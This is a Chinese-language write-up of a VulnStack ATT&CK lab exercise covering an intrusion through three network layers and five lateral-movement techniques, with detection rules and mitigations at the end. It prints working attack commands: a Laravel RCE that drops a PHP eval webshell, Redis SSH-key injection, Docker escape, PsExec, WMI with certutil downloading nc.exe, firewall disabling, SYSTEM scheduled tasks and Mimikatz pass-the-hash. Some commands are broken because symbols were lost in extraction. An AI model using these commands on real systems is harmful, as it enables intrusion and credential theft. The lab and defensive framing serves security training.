实战复盘:3层网络穿透与5种横向移动技术详解)
VulnStack ATTCK靶场七实战复盘3层网络穿透与5种横向移动技术详解1. 靶场环境与攻击路径全景解析VulnStack靶场构建了一个典型的企业级三层网络架构包含DMZ区、办公内网和核心业务区三个安全域。DMZ区部署对外服务的Web应用192.168.36.128二层网络存在Docker环境下的Web服务192.168.52.20和Windows 7主机192.168.52.30三层网络则部署域控制器192.168.93.30和终端主机192.168.93.40。各区域间通过双网卡实现网络隔离其中二层、三层网络无法直接出网这种设计模拟了真实企业网络的分区防护特点。攻击路径呈现典型的跳板式渗透外网突破通过Laravel Debug模式RCECVE-2021-3129获取DMZ区Web服务器控制权一层横向利用Redis未授权访问实现权限提升并通过Docker特权模式逃逸技术穿透容器隔离二层渗透借助通达OA任意用户登录漏洞CVE-2021-XXXX获取Windows 7主机权限域控拿下通过PsExec和WMI等横向移动技术最终控制域控制器关键网络拓扑与IP分配表网络区域主机角色IP地址操作系统关键服务DMZ区Web服务器192.168.36.128UbuntuNginx, Redis二层网络Docker主机192.168.52.20UbuntuDocker二层网络办公主机192.168.52.30Windows 7通达OA三层网络域控制器192.168.93.30Windows Server 2012Active Directory三层网络业务主机192.168.93.40Windows 7文件共享2. 关键漏洞利用与技术突破点2.1 初始入口突破技术细节Laravel Debug RCECVE-2021-3129的利用过程体现了框架级漏洞的杀伤力。当Ignition组件开启Debug模式时攻击者通过构造恶意Log文件触发Phar反序列化链。实际操作中需注意# 使用公开EXP生成Webshell python3 exploit.py --url http://192.168.36.128:81 --cmd echo ?php eval(\$_POST[pass]);? /var/www/html/fuckyou.phpRedis未授权访问的利用则展示了配置不当导致的安全风险。通过覆盖authorized_keys文件实现SSH免密登录# 生成SSH密钥并注入目标主机 (echo -e \n\n; cat ~/.ssh/id_rsa.pub; echo -e \n\n) key.txt cat key.txt | redis-cli -h 192.168.36.128 -x set crack redis-cli -h 192.168.36.128 config set dir /root/.ssh redis-cli -h 192.168.36.128 config set dbfilename authorized_keys redis-cli -h 192.168.36.128 save2.2 权限提升技术对比在Linux环境中的提权操作展示了多种技术路径环境变量劫持提权查找具有SUID权限的可执行文件find / -perm -us -type f 2/dev/null劫持PATH环境变量export PATH/tmp:$PATH替换关键系统命令实现权限提升Docker逃逸技术# 检查Docker环境特征 ls /.dockerenv cat /proc/1/cgroup # 挂载宿主机磁盘 mkdir /host mount /dev/sda1 /host # 写入SSH密钥实现持久化 echo ssh-rsa AAAAB3N... /host/home/ubuntu/.ssh/authorized_keys内核提权CVE-2021-3493 适用于Ubuntu 20.04等受影响版本通过overlayfs漏洞突破命名空间限制// exploit.c核心逻辑 int main() { char *args[] {/bin/bash, -p, NULL}; execve(/bin/bash, args, NULL); }3. 横向移动技术在ATTCK框架中的映射3.1 五种核心横向技术剖析1. PsExec利用T1021.002原理通过SMB服务上传服务二进制文件利用SCM创建远程服务执行条件目标开放445端口具备管理员凭据防火墙允许SMB通信msf6 use exploit/windows/smb/psexec set RHOSTS 192.168.93.30 set SMBUser administrator set SMBPass Whoami2021 set PAYLOAD windows/meterpreter/bind_tcp exploit2. WMI远程执行T1047优势无文件落地、默认不记录操作日志典型命令wmic /node:192.168.93.40 /user:administrator /password:Whoami2021 process call create cmd.exe /c certutil -urlcache -split -f http://192.168.52.10/nc.exe C:\\Windows\\Temp\\nc.exe3. SMB共享利用T1021.002通过IPC$共享执行命令net use \\192.168.93.40\IPC$ Whoami2021 /user:administrator sc \\192.168.93.40 create disablefirewall binpath netsh advfirewall set allprofiles state off4. 远程计划任务T1053.005结合schtasks创建定时任务schtasks /create /s 192.168.93.40 /u administrator /p Whoami2021 /tn update /tr C:\shell.exe /sc hourly /ru SYSTEM5. 哈希传递攻击T1550.002使用Mimikatz进行PtHsekurlsa::pth /user:administrator /domain:test.local /ntlm:329153f560eb329c0e1deea55e88a1e9 /run:cmd.exe3.2 技术对比与防御绕过技术类型协议日志记录检测难点缓解措施PsExecSMB系统日志服务创建事件限制Admin$共享访问WMIDCOM无默认日志无文件落地启用高级WMI日志SMBSMB登录日志合法协议滥用关闭IPC$共享计划任务RPC任务调度日志任务名伪装限制远程任务创建哈希传递多协议登录日志无需明文密码启用LSA保护4. 防御视角的对抗策略4.1 基于ATTCK的检测规则示例YARA规则检测PsExec特征rule psexec_service_creation { meta: description Detects PsExec service installation tactic TA0008 strings: $s1 PSEXESVC wide ascii $s2 PAA wide ascii // Service DLL magic condition: any of them }Sigma规则检测WMI异常title: Suspicious WMI Execution description: Detects WMI remote process creation tags: - attack.t1047 logsource: product: windows service: security detection: selection: EventID: 4688 ParentProcessName: *\wmiprvse.exe NewProcessName: *\cmd.exe condition: selection falsepositives: - Legitimate administrative activity level: high4.2 网络分段与权限控制矩阵建议实施的最小权限模型账户类型允许协议目标主机时段限制MFA要求域管理员RDP域控制器工作时间是服务器管理员WinRM业务服务器全天是普通用户HTTP/S应用服务器全天否服务账户SMB文件服务器全天N/A5. 实战经验与改进建议在多次演练中发现三个关键问题协议混淆检测攻击者将WMI流量封装在80端口HTTP可绕过传统IDS日志时间差横向移动产生的多主机日志时间不同步难以关联分析凭证保护不足多台主机使用相同本地管理员密码改进建议实施步骤部署网络层证书固定Certificate Pinning防止协议伪装配置SIEM系统的时间同步策略NTP校准±500ms启用LSA保护防止凭据窃取reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 1 /f6. 攻击路径可视化与工具链典型工具组合信息收集Nmap BloodHound漏洞利用Metasploit CVE定制EXP横向移动CrackMapExec Impacket套件权限维持Mimikatz EmpireATTCK技术映射表攻击阶段对应技术T编号检测建议初始访问Exploit Public-Facing ApplicationT1190Web应用防火墙执行Command-Line InterfaceT1059命令行审计持久化Web ShellT1505.003文件完整性监控横向移动Remote ServicesT1021网络会话监控数据收集Screen CaptureT1113进程行为分析